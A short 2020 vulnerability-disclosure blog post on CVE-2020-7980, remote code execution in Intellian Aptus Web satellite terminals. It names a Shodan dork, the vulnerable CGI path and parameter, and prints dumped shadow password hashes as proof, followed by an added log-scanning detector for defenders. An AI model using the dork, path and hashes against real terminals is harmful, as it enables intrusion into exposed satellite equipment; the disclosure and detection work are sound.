Thursday, January 23, 2020

[Intellian] "Aptus Web" #RCE #Intellian (CVE-2020-7980)

RCE on Satellite Terminals #Intellian



Vendor web: https://www.digisat.org/intellian-technologies


Intellian: Corporate video




In the wild!
Shodan dork: title:"Intellian Aptus Web"




Looking up the default credentials in the manual





WEB ACCESS:



DASHBOARD:



RCE PoCs (CVE-2020-7980)

Exploitable path: http://<host>/cgi-bin/libagent.cgi?type=J

Vulnerable parameter: Q

PoC 1: Request to the web service








PoC 2:




---

intellian_admin:$1$q8wWDSXA$C0K5h910lpUPTtqH8pdRK1:13514:0:99999:7:::
intellian:$1$ycRKwsqX$kl8gAbYxppv3q4Z.S/7BT/:18280:0:99999:7:::
masteruser:$1$xFUDm.YY$2nPqTkGmeFN4xRIMNS46D0:18280:0:99999:7:::
guest:$1$zAcAbgCW$t8FXlowm9EvLScxw9PrO6.:18280:0:99999:7:::

---
id



Tested on:

"Intellian, Aptus Web V100 v1.24"
"Intellian, Aptus Web V80 v1.24"
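
A defender-side check for the path and parameter named above, as an added example that is not from the original post: it scans web access logs for requests to `/cgi-bin/libagent.cgi` with `type=J` and marks those coming from outside the management network. The log format (Common Log Format from a proxy in front of the terminal), the subnet `10.0.0.0/24` and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: only this subnet should ever reach the terminal's web UI.
MGMT_NET = ipaddress.ip_network("10.0.0.0/24")
VULN_PATH = "/cgi-bin/libagent.cgi"  # path named in the post

# Common Log Format: ip - - [time] "METHOD target PROTO" status size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines (documentation addresses, placeholder values).
SAMPLE_LOG = """\
10.0.0.5 - - [23/Jan/2020:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.7 - - [23/Jan/2020:10:00:02 +0000] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 200 87
10.0.0.5 - - [23/Jan/2020:10:00:03 +0000] "GET /cgi-bin/libagent.cgi?type=J&Q=PLACEHOLDER HTTP/1.1" 200 90
198.51.100.9 - - [23/Jan/2020:10:00:04 +0000] "GET /cgi-bin/libagent.cgi?type=S HTTP/1.1" 200 40
not a log line
"""

def find_hits(log_text):
    """Return one dict per logged request to libagent.cgi with type=J."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of failing
        src, method, target, status = m.groups()
        url = urlsplit(target)
        params = parse_qs(url.query, keep_blank_values=True)
        if url.path != VULN_PATH or "J" not in params.get("type", []):
            continue
        try:
            external = ipaddress.ip_address(src) not in MGMT_NET
        except ValueError:
            external = True  # client field is not an IP address
        hits.append({
            "src": src, "method": method, "status": int(status),
            # Assumption: Q may also be sent in a request body, which
            # access logs do not record, so False here is not a clean bill.
            "q_in_url": "Q" in params,
            "external": external,
        })
    return hits

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```

Any hit with `external` set is worth reviewing, since the terminal's web interface should not be reachable from outside the management network in the first place.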








Regards,


Ezequiel
